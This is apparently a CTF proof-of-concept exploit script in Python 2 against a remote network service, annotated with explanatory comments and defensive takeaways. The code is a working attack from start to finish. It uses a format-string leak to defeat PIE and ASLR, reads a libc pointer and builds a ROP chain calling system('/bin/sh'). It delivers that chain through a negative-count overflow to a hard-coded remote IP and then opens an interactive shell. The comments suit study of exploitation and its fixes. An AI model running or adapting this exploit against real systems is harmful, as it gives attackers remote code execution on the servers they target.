# Proof-of-concept exploit script for a CTF-style network service (Python 2:
# print statements, backtick repr).  Everything below relies on `codez`
# (Remote, pack, unpack), which is not shown here, and on offsets tied to one
# specific binary/libc build, so nothing in this file is portable.
# Assumes Remote.read(delim) returns the bytes up to and including `delim`
# (the [:-1] slices below strip that delimiter) -- TODO confirm in codez.
#
# Vulnerability classes exercised, as far as the visible I/O shows:
#   * a format-string bug: the input line reaches printf's format argument,
#     so "%N$p" / "%N$s" disclose stack contents and arbitrary memory;
#   * a count/length handling bug in the 'Y' menu path, exploited with a
#     negative count and an oversized list of values (inferred from the
#     writes at the end -- TODO confirm against the challenge binary).
# Defensive takeaways: never pass untrusted data as a format string, validate
# element counts as unsigned/bounded values, and keep PIE/ASLR plus stack
# protection on -- the two leaks below exist precisely to defeat PIE and ASLR.
from codez import *

# Target selection and build-specific constants.  prinf_off/binsh/system are
# offsets inside libc (presumably printf, a "/bin/sh" string and system() --
# inferred from how they are used below, not verifiable here).
LOCAL = False
if LOCAL:
    prinf_off = 0x4fb10
    binsh = 0x164fea
    system = 0x3ffd0
    r = Remote('localhost',1234)
else:
    prinf_off = 0x54400
    binsh = 0x17D87B
    system = 0x46640
    r = Remote('54.65.28.239',9991)

# Step 1: leak a program address.  "%7$p" prints the 7th format argument (a
# stack slot); "###" is a sentinel so the reply can be delimited.  Subtracting
# 0xa5b turns that slot into the binary's load base; 0xa5b is presumably the
# in-binary offset of the code pointer that sits in slot 7 (build specific).
r.read('> ')
r.write('%7$p###\n')
x=r.read('#')[:-1]
base = int(x,16) - 0xa5b
print '[+] base ',hex(base)

# Step 2: find the format-argument index at which the input buffer itself is
# read: each probe sends "%N$p" plus eight 'A's and checks whether the reply
# shows 0x4141414141414141.  Every probe first answers 'N' to the menu prompt.
for i in range(50):
    r.read('>');r.write('N\n');r.read('>')
    r.write('%'+str(i+7)+'$pXXX'+'A'*8+'###\n')
    x=r.read('#')
    print x
    if '0x4141414141414141' in x:
        index = i+7
        break
# index = 11   (earlier hard-coded value, left for reference)
# NOTE(review): if none of the 50 probes matches, `index` is never bound and
# the next line raises NameError instead of reporting a clean failure.
print '[+] found index %d' % index

# Step 3: read memory with "%<index>$s", the address being embedded in the same
# input buffer at the slot found above.  base + 0x201FA0 is presumably a
# GOT/data slot holding a libc pointer (TODO confirm).  The read starts one
# byte in (+0x201FA1), presumably to avoid a byte that would cut the "%s"
# read short; the missing low byte is restored afterwards.
r.read('>');r.write('N\n');r.read('>')
print hex(base + 0x201FA0)
r.write('|%' + str(index)+'$sXX' + pack('Q',base + 0x201FA1 )+' ###\n')
x=r.read('X')[:-1]
print `x`
# Keep only what followed the '|' marker, NUL-pad it to a full QWORD, then
# reassemble the pointer: leaked bytes shifted up by one byte, low byte taken
# from the known offset (libc is page-aligned, so the low bits of an address
# equal the low bits of its offset).
x=x[x.index('|')+1:].ljust(8,"\x00")
_printf = unpack('Q',x)[0] << 8 | (prinf_off & 0xff)
print '[+] printf',hex(_printf)
libc = _printf - prinf_off
print '[+] libc',hex(libc)

# Step 4: ROP chain -- a gadget in the binary (base + 0xb53, "pop rdi" per the
# author's comment), then the "/bin/sh" string and system() in libc.
rop = [ base + 0xb53 ## pop rdi (gadget offset in the binary, per the author)
,libc + binsh
,libc + system ]
# The 'Y' path reads a count and then that many numbers.  A NEGATIVE count
# (-(9 + 2 * chain length)) is sent, followed by 54 filler values and the chain
# split into 32-bit halves, low half first.  The negative count presumably
# slips past a signed bounds check so the values run past the buffer onto the
# saved return address -- TODO confirm; server-side, the fix is an
# unsigned/bounded count check.
r.read('>');r.write('Y\n');r.read('>')
r.write('-' + str(9 + len(rop)*2)+'\n')
for i in range(46 + 8):
    r.write(str(0x41414141)+"\n")
for a in rop:
    hi = a >> 32
    low = a & 0xffffffff
    r.write(str(low)+"\n")
    r.write(str(hi)+"\n")
# Hand the connection to the operator once the chain has executed.
r.interactive()